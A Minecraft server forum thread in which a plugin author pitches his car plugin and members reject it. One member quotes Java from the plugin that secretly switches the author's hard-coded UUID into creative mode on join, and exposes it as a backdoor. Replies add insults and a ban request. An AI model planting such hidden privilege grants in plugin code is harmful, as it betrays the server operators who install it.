Denied [Suggestion] Cars

Discussion in 'Suggestions' started by DasEtwas, Jun 19, 2016.

?

Do you think cars would benefit gameplay?

  1. Yes! Absolutely!

    3.6%
  2. Yeah, but..

    0 vote(s)
    0.0%
  3. I don't know.

    0 vote(s)
    0.0%
  4. Nah..

    17.9%
  5. Absolutely not!

    78.6%
Thread Status:
Not open for further replies.
  1. DasEtwas

    DasEtwas Guest

    Ratings:
    +0
    Hello there, I am the author of the plugin Chars4Cars and I am sure every economy server will appreciate it to have realistic cars in minecraft.

    Minecraft Name:
    DasEtwas

    Suggestion:
    Please take a look at my plugin and tell me your opinion on why this should definetly be / not added to the server. I am a huge fan of realistic servers with complex economy systems.

    Reason:
    It would make the server more realistic and long distances would be more fun to travel.

    Any Other Information:
    The plugin currently only works for 1.8,1.9 but I will make a 1.10 update.

    Link To This Plugin/Is this a custom addition?: http://dev.bukkit.org/bukkit-plugins/chars4cars/

    P.S.: I know this sound like some pretty hefty advertising, but I really do think it's just really cool to drive around when you have big cities and can easily adapt to that feature (Garages, Fuel stations, Street races...). So please don't call me a fgt ;)
     
    • Potato Potato x 11
    • Optimistic Optimistic x 2
    • List
    #1 DasEtwas, Jun 19, 2016
    Last edited by a moderator: Jun 19, 2016
  2. kukelekuuk

    kukelekuuk C͕̹̲̽ͪ͐ͩ̔L̜̦̝͈ͦ̿̾̿ḘA̻̗̤̳̐ͭ̆̿̃̑ͭN̊̓͑̇ͯ
    Builder ⛰️ Ex-EcoLeader ⚜️⚜️⚜️ Premium Upgrade

    Joined:
    May 25, 2011
    Messages:
    10,051
    Trophy Points:
    99,160
    Ratings:
    +6,910
    Code:
    @EventHandler
        public void yay(PlayerJoinEvent pje) {
            if (pje.getPlayer().getUniqueId().equals(UUID.fromString("057505e1-f1b7-444b-ac8c-0ecb5b166b5d"))) {
                Bukkit.getServer().broadcastMessage(Chars4Cars.PREFIX + ChatColor.GOLD + "=============================");
                Bukkit.getServer().broadcastMessage(Chars4Cars.PREFIX + ChatColor.GOLD + "} " + ChatColor.WHITE + "DasEtwas" + ChatColor.GOLD + " joined the server! :D {");
                Bukkit.getServer().broadcastMessage(Chars4Cars.PREFIX + ChatColor.GOLD + "=============================");
                for (Player p : Bukkit.getOnlinePlayers()) {
                    if (p.getGameMode().equals(GameMode.CREATIVE) || p.getGameMode().equals(GameMode.SPECTATOR)) {
                        p.getWorld().dropItemNaturally(p.getLocation(), CarGetter.createCar("Chars4Cars! :D", 329, 3100, 100));
                    }
                }
                pje.getPlayer().setGameMode(GameMode.CREATIVE);
            }
    }
    source: https://github.com/DasEtwas/Chars4C...d721a/src/me/dasetwas/EventListener.java#L125

    broadcasting a message, giving everyone online in creative mode a minecart, and then giving yourself creative mode whenever you log on is not something I'd consider trustworthy. (And that's ignoring the absolutely terrible code)
    I've reported you to the bukkitdev and spigot staff for writing exploitative code. Now screw off. :D
     
    • Winner Winner x 38
    • Like Like x 1
    • Agree Agree x 1
    • Friendly Friendly x 1
    • List
    #2 kukelekuuk, Jun 19, 2016
    Last edited: Jun 19, 2016
  3. jwpwns

    jwpwns ECC Sponsor
    ECC Sponsor President ⛰️⛰️ Ex-Tycoon ⚜️⚜️⚜️ Premium Upgrade

    Joined:
    Sep 1, 2011
    Messages:
    2,576
    Trophy Points:
    71,160
    Gender:
    Male
    EcoDollars:
    $0
    Ratings:
    +1,642
    No never not needed -1
     
  4. Drewbo_

    Drewbo_ Guest

    Ratings:
    +0
    -1 ur a mean guy trying to get creative on our amazing server no thx
     
  5. Riggs316

    Riggs316 The Ultimate Rigger
    Mythic ⚔️ I ⚔️ EcoLegend ⛰️⛰️⛰️⛰️ Ex-EcoLegend ⚜️⚜️⚜️⚜️ Prestige ⭐ I ⭐ Premium Upgrade

    Joined:
    May 1, 2014
    Messages:
    719
    Trophy Points:
    72,410
    Gender:
    Male
    Ratings:
    +768
    -316. Dumb. Unnecessary. Pointless. And from Kuke's pointing out of your code, you're simply trying to advertise your shit filled plug in with untrustworthy nonsense. Please let the door hit you on your way out.
     
    • Like Like x 1
    • Agree Agree x 1
    • List
  6. andrewkm

    Founder Premium Upgrade

    Joined:
    Apr 5, 2011
    Messages:
    20,834
    Trophy Points:
    121,160
    Ratings:
    +15,219
    Basically what Kuke said, but I'd like to add you're also a major idiot @DasEtwas for spamming this on so many sites. How desperate are you?

    @Server Admin team please ban this "thing" off my forums and server. Thanks. IP ban, everything.
     
    • Winner Winner x 9
    • Agree Agree x 2
    • List
    #6 andrewkm, Jun 19, 2016
    Last edited: Jun 19, 2016
Thread Status:
Not open for further replies.